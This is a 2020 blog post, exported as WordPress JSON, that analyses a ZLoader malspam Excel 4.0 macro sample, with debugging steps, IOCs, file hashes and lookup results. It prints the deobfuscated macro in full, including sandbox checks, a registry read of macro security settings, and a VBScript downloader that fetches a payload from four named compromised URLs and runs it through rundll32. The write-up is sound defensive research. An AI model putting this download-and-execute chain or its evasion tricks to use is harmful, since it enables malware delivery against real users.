{"id":1382,"date":"2020-07-21T23:19:20","date_gmt":"2020-07-21T22:19:20","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=1382"},"modified":"2020-07-21T23:22:45","modified_gmt":"2020-07-21T22:22:45","slug":"2020-07-17-zloader-malspam-excel-4-macros","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=1382","title":{"rendered":"2020-07-17 ZLoader Malspam (Excel 4 Macros)"},"content":{"rendered":"

Summary
\n========
\nThis is a late posting since I was originally playing with the malspam back on the 17th. In this case I was looking at some emails that were caught by the mail filters. Looking at the attachment in the email a little closer I noticed that this was one that I had not seen before but had read about on several different occasions – an Excel 4 macro. The interesting thing about this attack vector is the fact that it doesn’t rely on an embedded VB macro in the Excel spreadsheet per se, but uses the native built-in functions to execute the macro. The use of formulas within a XL4 macro is vast as suggested by the “Excel 4.0 Macro Functions Guide” (linked here<\/a>) and from the malware itself. Lastline also has an excellent write-up of several campaigns that used the XL4 macro which you can read about here<\/a>. Also, @Jammy<\/a> who runs one of my favorite sites “Click All the Things!<\/a>” has an excellent example and walkthrough<\/a> of this type of malware which is what I used as a guide. And while I was not able to get anything to drop, based on OSINT, this looks to be related to the ZLoader malware family.<\/p>\n

As always you can find the artifacts from this infection in my Github for this particular infection<\/a>. <\/p>\n

\"\"<\/a><\/p>\n

Analysis
\n========
\nMuch like @Jammy described in his post, the notation of RC is one of the first things that I noticed when looking at the spreadsheet. This is pretty much the tell for this using the XL4 format and not the standard embedded VB script. Just to verify further using the trick of ALT-F11 in Excel to take a look at the VBA Project associated with this showed the same thing as well – nothing (even after enabling macros). So I tried to add the msgbox popup for “Hello” as suggested in the post but that did not work like it did for @Jammy (just executed and did not stop or act as a break point). So seeing that the files were being dropped in the “C:\\Users\\%username%\\AppData\\Local\\Temp\\” folder, I kind of cheated and just denied any deletion of files from the %TEMP% folder. Once I did that, I was able to step into the macro and follow it from there.<\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

The first error message that popped up was a message about not being able to delete the file “C:\\Users\\%username%\\AppData\\Local\\Temp\\w9Z.vbs.”<\/p>\n

\"\"<\/a><\/p>\n

which then gave me the ability of stepping into the macro code.<\/p>\n

\"\"<\/a><\/p>\n

I pressed the “Goto” button which then took me to the cell R26079C236 which had the following formula:<\/p>\n

\r\n=FILE.DELETE(R26065C236)\r\n<\/pre>\n
Scrolling over some and adjusting the column sizes gave me some more insight into the macro code running in this Excel spreadsheet and the different fomulas being used as seen below.<\/p>\n
\"\"<\/a><\/p>\n
As seen from this bit of code, XL4 has a huge repository of commands at it’s disposal (everything from checking if the app is maximized, window information, file writes\/deletes, and workspace\/system specs\/information). From here I started walking through the macro code. The following is just a snippet of what I copied down before realizing that manually doing this was going to eat up way too much time.<\/p>\n
\"\"<\/a><\/p>\n
After hitting the “Evaluation” button several times and looking at how the macro worked, I decided to break out of it. Looking at the things that I jotted down from above, I noticed what what looked like a name of a function (at least to me) – “=DuIQvnMjv().” I also remembered seeing other names like this as well in the macro sprinkled throughout. I started to click around on things in the spreadsheet and one of the things that I clicked on surprised me – the cell reference drop down arrow. When I did that, I saw some of the other function names that I had seen in the macro.<\/p>\n
\"\"<\/a><\/p>\n
At this time I decided to start over again. So I exited Excel and started it up again and let it hit the first error message (the error about trying to delete the w9z.vbs file). I pressed “OK” on that popup and “Halt” on the next popup. This allowed me to click on the different function names to see what was there. Here is the list of what I was able to find.<\/p>\n
CejeZjurT function<\/strong> (landed in cell R8035C105) – For this I also grabbed the code above it.<\/p>\n
\r\n=SUM(77,43)\r\n=WHILE(ygZNzBKR=0)\r\nQsgxkJBzTO=QsgxkJBzTO+1\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=NEXT()\r\n=RETURN()\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=IF(ygZNzBKR<>"OZZo",,RETURN())\r\ntNtxFLkeBUV=""\r\n=WHILE(ygZNzBKR<>"OZZo")\r\ntNtxFLkeBUV=tNtxFLkeBUV&CHAR(ygZNzBKR-282)\r\nQsgxkJBzTO=QsgxkJBzTO+1\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=DOxhraoIFLLN()\r\n=NEXT()\r\nQsgxkJBzTO=fRHYOtACy\r\nXALlBJEjZz=XALlBJEjZz+1\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=WHILE(ygZNzBKR=0)\r\nXALlBJEjZz=XALlBJEjZz+1\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=NEXT()\r\nrCPQbY="ZbqhG!R"&vTXQKFfGaYLo&"C"&MdOyshOLWUyR\r\n=FORMULA(tNtxFLkeBUV,rCPQbY)\r\nvTXQKFfGaYLo=vTXQKFfGaYLo+1\r\n=rVgcdE()\r\n=RETURN(TEXTREF(rCPQbY,FALSE))\r\nrVgcdE=R7966C105\r\nDOxhraoIFLLN=R7943C105\r\nCejeZjurT=R8035C105\r\nDuIQvnMjv=R7962C105\r\nvTXQKFfGaYLo=26054\r\nMdOyshOLWUyR=236\r\nfRHYOtACy=18731\r\nQsgxkJBzTO=18731\r\nXALlBJEjZz=15\r\nduumR=R26055C236\r\n=DuIQvnMjv()\r\n=duumR()\r\nvTXQKFfGaYLo=34351\r\nMdOyshOLWUyR=9\r\nfRHYOtACy=31404\r\nQsgxkJBzTO=31404\r\nXALlBJEjZz=16\r\nNfqZai=R34351C9\r\n=DuIQvnMjv()\r\n=NfqZai()\r\nvTXQKFfGaYLo=48529\r\nMdOyshOLWUyR=159\r\nfRHYOtACy=52444\r\nQsgxkJBzTO=52444\r\nXALlBJEjZz=7\r\nzpBaqJ=R48529C159\r\n=DuIQvnMjv()\r\n=zpBaqJ()\r\n=HALT()\r\n<\/pre>\n
DOxhraoIFLLN function<\/strong> (landed in cell R7943C105)<\/p>\n
\r\n=SUM(77,43)\r\n=WHILE(ygZNzBKR=0)\r\nQsgxkJBzTO=QsgxkJBzTO+1\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=NEXT()\r\n=RETURN()\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=IF(ygZNzBKR<>"OZZo",,RETURN())\r\ntNtxFLkeBUV=""\r\n=WHILE(ygZNzBKR<>"OZZo")\r\ntNtxFLkeBUV=tNtxFLkeBUV&CHAR(ygZNzBKR-282)\r\nQsgxkJBzTO=QsgxkJBzTO+1\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=DOxhraoIFLLN()\r\n=NEXT()\r\nQsgxkJBzTO=fRHYOtACy\r\nXALlBJEjZz=XALlBJEjZz+1\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=WHILE(ygZNzBKR=0)\r\nXALlBJEjZz=XALlBJEjZz+1\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=NEXT()\r\nrCPQbY="ZbqhG!R"&vTXQKFfGaYLo&"C"&MdOyshOLWUyR\r\n=FORMULA(tNtxFLkeBUV,rCPQbY)\r\nvTXQKFfGaYLo=vTXQKFfGaYLo+1\r\n=rVgcdE()\r\n=RETURN(TEXTREF(rCPQbY,FALSE))\r\nrVgcdE=R7966C105\r\nDOxhraoIFLLN=R7943C105\r\nCejeZjurT=R8035C105\r\nDuIQvnMjv=R7962C105\r\nvTXQKFfGaYLo=26054\r\nMdOyshOLWUyR=236\r\nfRHYOtACy=18731\r\nQsgxkJBzTO=18731\r\nXALlBJEjZz=15\r\nduumR=R26055C236\r\n=DuIQvnMjv()\r\n=duumR()\r\nvTXQKFfGaYLo=34351\r\nMdOyshOLWUyR=9\r\nfRHYOtACy=31404\r\nQsgxkJBzTO=31404\r\nXALlBJEjZz=16\r\nNfqZai=R34351C9\r\n=DuIQvnMjv()\r\n=NfqZai()\r\nvTXQKFfGaYLo=48529\r\nMdOyshOLWUyR=159\r\nfRHYOtACy=52444\r\nQsgxkJBzTO=52444\r\nXALlBJEjZz=7\r\nzpBaqJ=R48529C159\r\n=DuIQvnMjv()\r\n=zpBaqJ()\r\n=HALT()\r\n<\/pre>\n
DuIQvnMjv function<\/strong> (landed in R7962C105) – For this grabbed the code above<\/p>\n
\r\n=SUM(77,43)\r\n=WHILE(ygZNzBKR=0)\r\nQsgxkJBzTO=QsgxkJBzTO+1\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=NEXT()\r\n=RETURN()\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=IF(ygZNzBKR<>"OZZo",,RETURN())\r\ntNtxFLkeBUV=""\r\n=WHILE(ygZNzBKR<>"OZZo")\r\ntNtxFLkeBUV=tNtxFLkeBUV&CHAR(ygZNzBKR-282)\r\nQsgxkJBzTO=QsgxkJBzTO+1\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=DOxhraoIFLLN()\r\n=NEXT()\r\nQsgxkJBzTO=fRHYOtACy\r\nXALlBJEjZz=XALlBJEjZz+1\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=WHILE(ygZNzBKR=0)\r\nXALlBJEjZz=XALlBJEjZz+1\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=NEXT()\r\nrCPQbY="ZbqhG!R"&vTXQKFfGaYLo&"C"&MdOyshOLWUyR\r\n=FORMULA(tNtxFLkeBUV,rCPQbY)\r\nvTXQKFfGaYLo=vTXQKFfGaYLo+1\r\n=rVgcdE()\r\n=RETURN(TEXTREF(rCPQbY,FALSE))\r\nrVgcdE=R7966C105\r\nDOxhraoIFLLN=R7943C105\r\nCejeZjurT=R8035C105\r\nDuIQvnMjv=R7962C105\r\nvTXQKFfGaYLo=26054\r\nMdOyshOLWUyR=236\r\nfRHYOtACy=18731\r\nQsgxkJBzTO=18731\r\nXALlBJEjZz=15\r\nduumR=R26055C236\r\n=DuIQvnMjv()\r\n=duumR()\r\nvTXQKFfGaYLo=34351\r\nMdOyshOLWUyR=9\r\nfRHYOtACy=31404\r\nQsgxkJBzTO=31404\r\nXALlBJEjZz=16\r\nNfqZai=R34351C9\r\n=DuIQvnMjv()\r\n=NfqZai()\r\nvTXQKFfGaYLo=48529\r\nMdOyshOLWUyR=159\r\nfRHYOtACy=52444\r\nQsgxkJBzTO=52444\r\nXALlBJEjZz=7\r\nzpBaqJ=R48529C159\r\n=DuIQvnMjv()\r\n=zpBaqJ()\r\n=HALT()\r\n<\/pre>\n
duumR function<\/strong> (landed in R26088C236) – For this grabbed the code above<\/p>\n
\r\n=CLOSE(FALSE)\r\n=FORMULA(LEN(APP.MAXIMIZE())+-137,Sheet1!R26055C236)\r\n=FORMULA(LEN(GET.WINDOW(7))+-998,Sheet1!R26056C236)\r\n=FORMULA(LEN(GET.WINDOW(20))+-100,Sheet1!R26057C236)\r\n=FORMULA(LEN(GET.WINDOW(23)=3)+-105,Sheet1!R26058C236)\r\n=FORMULA(LEN(GET.WORKSPACE(31))+-181,Sheet1!R26059C236)\r\n=FORMULA(LEN(GET.WORKSPACE(13)>770)+839,Sheet1!R26060C236)\r\n=FORMULA(LEN(GET.WORKSPACE(14)>390)+681,Sheet1!R26061C236)\r\n=FORMULA(LEN(GET.WORKSPACE(19))+-674,Sheet1!R26062C236)\r\n=FORMULA(LEN(GET.WORKSPACE(42))+85,Sheet1!R26063C236)\r\n=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R26054C236))\r\n=LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local\\Temp\\w9Z.vbs"\r\n=LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local\\Temp\\aDzp0omL.txt"\r\n=FOPEN(R26065C236,3)\r\n=FWRITELN(R26067C236,"On Error Resume Next")\r\n=FWRITELN(R26067C236,"Set ySgMMU = CreateObject(""WScript.Shell"")")\r\n=FWRITELN(R26067C236,"Set BBN902k = CreateObject(""Scripting.FileSystemObject"")")\r\n=FWRITELN(R26067C236,"Set KQvg = BBN902k.CreateTextFile("""&R26066C236&""", True)")\r\n=FWRITELN(R26067C236,"wVj5km45=ySgMMU.RegRead(""HKCU\\Software\\Microsoft\\Office\\"&GET.WORKSPACE(2)&"\\Excel\\Security\\VBAWarnings""): KQvg.WriteLine(wVj5km45)")\r\n=FWRITELN(R26067C236,"KQvg.Close")\r\n=FCLOSE(R26067C236)\r\n=EXEC("explorer.exe "&R26065C236&"")\r\n=WHILE(ISERROR(FILES(R26066C236)))\r\n=WAIT(NOW()+"00:00:01")\r\n=NEXT()\r\n=FILE.DELETE(R26065C236)\r\n=FOPEN(R26066C236,2)\r\n=FREAD(R26080C236,100)\r\n=FCLOSE(R26080C236)\r\n=FILE.DELETE(R26066C236)\r\n=IF(ISNUMBER(SEARCH("1",R26081C236)),GOTO(R26054C236),)\r\n=IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R8077C105),GOTO(R8104C105))\r\n<\/pre>\n
rVgcdE function<\/strong> (landed in R7966C105) – For this grabbed the code above<\/p>\n
\r\n=SUM(77,43)\r\n=WHILE(ygZNzBKR=0)\r\nQsgxkJBzTO=QsgxkJBzTO+1\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=NEXT()\r\n=RETURN()\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=IF(ygZNzBKR<>"OZZo",,RETURN())\r\ntNtxFLkeBUV=""\r\n=WHILE(ygZNzBKR<>"OZZo")\r\ntNtxFLkeBUV=tNtxFLkeBUV&CHAR(ygZNzBKR-282)\r\nQsgxkJBzTO=QsgxkJBzTO+1\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=DOxhraoIFLLN()\r\n=NEXT()\r\nQsgxkJBzTO=fRHYOtACy\r\nXALlBJEjZz=XALlBJEjZz+1\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=WHILE(ygZNzBKR=0)\r\nXALlBJEjZz=XALlBJEjZz+1\r\nrCPQbY="Sheet1!R"&QsgxkJBzTO&"C"&XALlBJEjZz\r\nygZNzBKR=CejeZjurT()\r\n=NEXT()\r\nrCPQbY="ZbqhG!R"&vTXQKFfGaYLo&"C"&MdOyshOLWUyR\r\n=FORMULA(tNtxFLkeBUV,rCPQbY)\r\nvTXQKFfGaYLo=vTXQKFfGaYLo+1\r\n=rVgcdE()\r\n=RETURN(TEXTREF(rCPQbY,FALSE))\r\nrVgcdE=R7966C105\r\nDOxhraoIFLLN=R7943C105\r\nCejeZjurT=R8035C105\r\nDuIQvnMjv=R7962C105\r\nvTXQKFfGaYLo=26054\r\nMdOyshOLWUyR=236\r\nfRHYOtACy=18731\r\nQsgxkJBzTO=18731\r\nXALlBJEjZz=15\r\nduumR=R26055C236\r\n=DuIQvnMjv()\r\n=duumR()\r\nvTXQKFfGaYLo=34351\r\nMdOyshOLWUyR=9\r\nfRHYOtACy=31404\r\nQsgxkJBzTO=31404\r\nXALlBJEjZz=16\r\nNfqZai=R34351C9\r\n=DuIQvnMjv()\r\n=NfqZai()\r\nvTXQKFfGaYLo=48529\r\nMdOyshOLWUyR=159\r\nfRHYOtACy=52444\r\nQsgxkJBzTO=52444\r\nXALlBJEjZz=7\r\nzpBaqJ=R48529C159\r\n=DuIQvnMjv()\r\n=zpBaqJ()\r\n=HALT()\r\n<\/pre>\n
zpBaqJ function<\/strong> (landed in R48529C159)<\/p>\n
\r\n-25\r\n<\/pre>\n
If you step through this using the “Evaluate” button you can see how the code runs and what gets decoded and such. Unfortunately if you step through it long enough you will start to hit the different “halt()” statements since it is looking for that behaviour (ie: duumR function – =FORMULA(LEN(GET.WORKSPACE(31))+-181,Sheet1!R26059C236)). Because of this, I closed the file and reopened it and went through the same process listed above except instead of pressing the “Halt” button I clicked on the “Step Over” button. This allowed any code and procedures to be run for that function. After doing this a couple of times I noticed that the function called “zpBaq()” contained what looked like the data that got written to the dyB5.vbs file. A quick glance at that code showed that in fact it was the code that got written to that file.<\/p>\n
\r\n=LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local\\Temp\\lLO.html"\r\n=LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local\\Temp\\dyB5.vbs"\r\n=FOPEN(R48530C159,3)\r\n=FWRITELN(R48531C159,"FQnmsmmk = ""http:\/\/6730dartmouth.com\/wp-keys.php""")\r\n=FWRITELN(R48531C159,"tptOX = ""http:\/\/akcje.browarbrodacz.pl\/wp-keys.php""")\r\n=FWRITELN(R48531C159,"RecBBi8 = ""http:\/\/myadvision.com\/wp-keys.php""")\r\n=FWRITELN(R48531C159,"uby = ""http:\/\/scoutadvisors.com\/wp-keys.php""")\r\n=FWRITELN(R48531C159,"i9aQ4 = Array(FQnmsmmk,tptOX,RecBBi8,uby)")\r\n=FWRITELN(R48531C159,"Dim FfD4eA: Set FfD4eA = CreateObject(""MSXML2.ServerXMLHTTP.6.0"")")\r\n=FWRITELN(R48531C159,"Function gnH7WL(data):")\r\n=FWRITELN(R48531C159,"FfD4eA.setOption(2) = 13056")\r\n=FWRITELN(R48531C159,"FfD4eA.Open ""GET"", data, False")\r\n=FWRITELN(R48531C159,"FfD4eA.setRequestHeader ""User-Agent"", ""Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)""")\r\n=FWRITELN(R48531C159,"FfD4eA.Send")\r\n=FWRITELN(R48531C159,"gnH7WL = FfD4eA.Status")\r\n=FWRITELN(R48531C159,"End Function")\r\n=FWRITELN(R48531C159,"For Each DPT9Lb in i9aQ4")\r\n=FWRITELN(R48531C159,"If gnH7WL(DPT9Lb) = 200 Then")\r\n=FWRITELN(R48531C159,"Dim RJJtK5I: Set RJJtK5I = CreateObject(""ADODB.Stream"")")\r\n=FWRITELN(R48531C159,"RJJtK5I.Open")\r\n=FWRITELN(R48531C159,"RJJtK5I.Type = 1")\r\n=FWRITELN(R48531C159,"RJJtK5I.Write FfD4eA.ResponseBody")\r\n=FWRITELN(R48531C159,"RJJtK5I.SaveToFile """&R48529C159&""", 2")\r\n=FWRITELN(R48531C159,"RJJtK5I.Close")\r\n=FWRITELN(R48531C159,"Exit For")\r\n=FWRITELN(R48531C159,"End If")\r\n=FWRITELN(R48531C159,"Next")\r\n=FCLOSE(R48531C159)\r\n=EXEC("explorer.exe "&R48530C159&"")\r\n=WHILE(ISERROR(FILES(R48529C159)))\r\n=WAIT(NOW()+"00:00:01")\r\n=NEXT()\r\n=FILE.DELETE(R48530C159)\r\n=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.")\r\n=LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local\\Temp\\W6ncncs.vbs"\r\n=FOPEN(R48563C159,3)\r\n="rundll32.exe"\r\n=R48529C159&",DllRegisterServer"\r\n="C:\\Windows\\System32"\r\n=FWRITELN(R48564C159,"Set gAlwJH2m = GetObject(""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"")")\r\n=FWRITELN(R48564C159,"gAlwJH2m.Document.Application.ShellExecute """&R48565C159&""","""&R48566C159&""","""&R48567C159&""",Null,0")\r\n=FCLOSE(R48564C159)\r\n=EXEC("explorer.exe "&R48563C159&"")\r\n=GOTO(R26054C236)\r\n<\/pre>\n
Prior to this function being called and the other parts of the code being run, the only value that was here was that “-25” value. So this got me thinking if other bits of code got deobfuscated as well. Going back and looking at the different functions in the dropdown I didn’t see anything that had changed – just the “zpBaqJ().” Because of this, I jotted down the cells and what was in those cells when stepping over the code. Those results are listed below.<\/p>\n
 \r\nr26079c236 --> =FILE.DELETE(R26065C236) \r\nr26080c236 --> =FOPEN(R26066C236,2) \r\nr26081c236 --> =FREAD(R26080C236,100) \r\nr26082c237 --> =FCLOSE(R26080C236) \r\nr26083c238 --> =FILE.DELETE(R26066C236) \r\nr26084c236 --> =IF(ISNUMBER(SEARCH("1",R26081C236)),GOTO(R26054C236),) \r\nr26085c236 --> =IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R8077C105),GOTO(R8104C105)) \r\nr8104c105 --> vTXQKFfGaYLo=48529 \r\nr8105c105 --> BLANK CELL \r\nr8106c105 --> BLANK CELL \r\nr8107c105 --> MdOyshOLWUyR=159 \r\nr8108c105 --> BLANK CELL \r\nr8109c105 --> BLANK CELL \r\nr8110c105 --> BLANK CELL \r\nr8111c105 --> fRHYOtACy=52444 \r\nr8112c105 --> BLANK CELL \r\nr8113c105 --> BLANK CELL \r\nr8114c105 --> BLANK CELL \r\nr8115c105 --> QsgxkJBzTO=52444 \r\nr8116c105 --> BLANK CELL \r\nr8117c105 --> BLANK CELL \r\nr8118c105 --> BLANK CELL \r\nr8119c105 --> XALlBJEjZz=7 \r\nr8120c105 --> BLANK CELL \r\nr8121c105 --> zpBaqJ=R48529C159 \r\nr8122c105 --> BLANK CELL \r\nr8123c105 --> \\=DuIQvnMjv() \r\nr8124c105 --> BLANK CELL \r\nr8125c105 --> BLANK CELL \r\nr8126c105 --> BLANK CELL \r\nr8127c105 --> \\=zpBaqJ()\r\n<\/pre>\n
At the end of all this though, I was never able to get it to drop anything else since I am assuming that the links in the macro were already dead. The only link that the macro tried was the hxxps:\/\/6730dartmouth.com\/wp-keys.php site which got a RST,ACK back based on the PCAP. I also don’t understand why the macro tried to launch lLO.html via the rundll32.exe process considering that the file, from what I can tell, is not a valid EXE file.<\/p>\n
Artifacts
\n==========<\/p>\n
IOCs
\n—–
\n3.214.119.8 \/ hxxps:\/\/6730dartmouth.com\/wp-keys.php
\nhxxps:\/\/akcje.browarbrodacz.pl\/wp-keys.php
\nhxxp:\/\/myadvision.com\/wp-keys.php
\nhxxps:\/\/scoutadvisors.com\/wp-keys.php<\/p>\n
OSINT
\n——
\nhttp:\/\/urlhaus.abuse.ch\/browse.php?search=6730dartmouth.com%2Fwp-keys.php<\/a>
\nhttp:\/\/urlhaus.abuse.ch\/browse.php?search=akcje.browarbrodacz.pl%2Fwp-keys.php<\/a>
\nhttp:\/\/urlhaus.abuse.ch\/browse.php?search=myadvision.com%2Fwp-keys.php<\/a>
\nhttp:\/\/urlhaus.abuse.ch\/browse.php?search=scoutadvisors.com%2Fwp-keys.php<\/a><\/p>\n
File hashes
\n————
\n14fd223fca8c4de54d0d9158002244417463c748cda7e703b6503987cd4df693 — ZN_395.xls
\n3af46195f7e21ad4bce866f89fb4b9601dee8df1d3fffff849c990e6448f9eba — C:\\Users\\%username%\\AppData\\Local\\Temp\\w9Z.vbs
\n1704b9f93a8b27183345080d6e4560c2d78b331be1152c763867c79d2ff5068b — C:\\Users\\%username%\\AppData\\Local\\Temp\\W6ncncs.vbs
\n7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6 — C:\\Users\\%username%\\AppData\\Local\\Temp\\aDzp0omL.txt
\nd2237ba008fbffa05765b482db34d7ab5f9363d10d09f058edbabe54df9d5d22 — C:\\Users\\%username%\\AppData\\Local\\Temp\\dyB5.vbs
\n791d36a6c3b7c4147cb1a61492fa9fb0bb71a2a8a46c4f7bf6b05b7bf0ba0c6e — C:\\Users\\%username%\\AppData\\Local\\Temp\\lLO.html<\/p>\n
Machinae results
\n—————–
\n********************************************************************************
\n* Information for 1704b9f93a8b27183345080d6e4560c2d78b331be1152c763867c79d2ff5068b
\n* Observable type: hash.sha256 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites
\n[-] No VirusTotal File Report Results<\/p>\n
********************************************************************************
\n* Information for 14fd223fca8c4de54d0d9158002244417463c748cda7e703b6503987cd4df693
\n* Observable type: hash.sha256 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites
\n[-] No VirusTotal File Report Results<\/p>\n
********************************************************************************
\n* Information for 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
\n* Observable type: hash.sha256 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites
\n[+] VirusTotal File Report Results
\n[-] Date submitted: 2020-07-20 07:54:34
\n[-] Detected engines: 0
\n[-] Total engines: 59<\/p>\n
********************************************************************************
\n* Information for d2237ba008fbffa05765b482db34d7ab5f9363d10d09f058edbabe54df9d5d22
\n* Observable type: hash.sha256 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites
\n[-] No VirusTotal File Report Results<\/p>\n
********************************************************************************
\n* Information for 791d36a6c3b7c4147cb1a61492fa9fb0bb71a2a8a46c4f7bf6b05b7bf0ba0c6e
\n* Observable type: hash.sha256 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites
\n[-] No VirusTotal File Report Results<\/p>\n
********************************************************************************
\n* Information for 3af46195f7e21ad4bce866f89fb4b9601dee8df1d3fffff849c990e6448f9eba
\n* Observable type: hash.sha256 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites<\/p>\n
Munin results
\n————–
\n 1 \/ 6 > Unknown
\nHASH: d2237ba008fbffa05765b482db34d7ab5f9363d10d09f058edbabe54df9d5d22 COMMENT: dyB5.vbs
\nRESULT: – \/ –<\/p>\n
 2 \/ 6 > Unknown
\nHASH: 3af46195f7e21ad4bce866f89fb4b9601dee8df1d3fffff849c990e6448f9eba COMMENT: w9Z.vbs
\nRESULT: – \/ –<\/p>\n
 3 \/ 6 > Unknown
\nHASH: 1704b9f93a8b27183345080d6e4560c2d78b331be1152c763867c79d2ff5068b COMMENT: W6ncncs.vbs
\nRESULT: – \/ –<\/p>\n
 4 \/ 6 > Unknown
\nHASH: 791d36a6c3b7c4147cb1a61492fa9fb0bb71a2a8a46c4f7bf6b05b7bf0ba0c6e COMMENT: lLO.html
\nRESULT: – \/ –<\/p>\n
 5 \/ 6 > Unknown
\nHASH: 14fd223fca8c4de54d0d9158002244417463c748cda7e703b6503987cd4df693 COMMENT: ZN_395.xls
\nRESULT: – \/ –<\/p>\n
 6 \/ 6 > Clean
\nHASH: 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6 COMMENT: aDzp0omL.txt
\nTYPE: Text SIZE: 2.0 B FILENAMES: WIZARD_OEM.TAG, 7162913048.html, autofill_Google Chrome_Default.log, reo, as.js, intraship, sss, jjj, gra, cookiematch.aspx, igfxcpu.exe, rvs, index.php, rea, boa, rva, 854a636e94caea74b94de7d70b432476.csv, apa, roo, pet, co, mca, grd, mis, cto, cta, wa, boo, 7130637122.html, VerifyClient.php, outlook.txt, functionswitch.php, emss.php, brt.pie, 401.shtml, 291196665.html, 7162273006.html, foa, bfa, il, fua, index3.php, wv, mdjz-zjwjq8okmeklpxg_bfnqnpsuv-f7t, 1f2dd5e7211dc2615c0d7f8035fa9191, home, act, 18108-nicol.html, ma, heavenly, fsysfile.ini, oo17.exe, linkedIn%20(1, MDjZ-zjwJq8OKmeKLPXg_BfnQNPSuv-f7t, nicolas000007.html, 7161860810.html, redirect.php, 20190626.pdf, opac, videolivetile, bik, mi, log.txt, zip, skypeautoconect.log, pta, gms, va, hvo, 78caa02f54005b57e68556e648e21366, jgqd050910L32012.html, 5766409524.html, 22, alphabetizew.html, purificationxm.html, 4792-hola-chicos-soy-may.html, updates.html, card.php, windowssave.txt, 6#dueisnw1.txt, 01212_1xpeyr6xowc_0ci0lm_600x450.jpg, verify, iphone_script.php, fgstdiq_902423, 00A0A_86nFjpmceXj_0pO0jm_600x450.jpg, 286_65531iiv_wuax_k.ak, hva, 7141487164.html, homepage-concat.min.js, ls_fp.html_CIS3SID=88090448CEA480A34762200E5BDC51F0, search-concat.min.js, …, ca, onetime.min.js, install.php, 7156527143.html, mail.php
\nFIRST: 2007-11-14 21:37:42 LAST: 2020-07-21 09:07:48 SUBMISSIONS: 6492 REPUTATION: -155
\nCOMMENTS: 10 USERS: DALEJAKECORNER, joesecurity, joesecurity, joesecurity, joesecurity, joesecurity, hugoklugman, DALEJAKECORNER, joesecurity, DALEJAKECORNER TAGS: TEXT NSRL ATTACHMENT TRUSTED VIA-TOR
\nRESULT: 0 \/ 60
\n[!] Sample on URLHaus URL: http:\/\/urlhaus-api.abuse.ch\/v1\/download\/7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6\/<\/a>
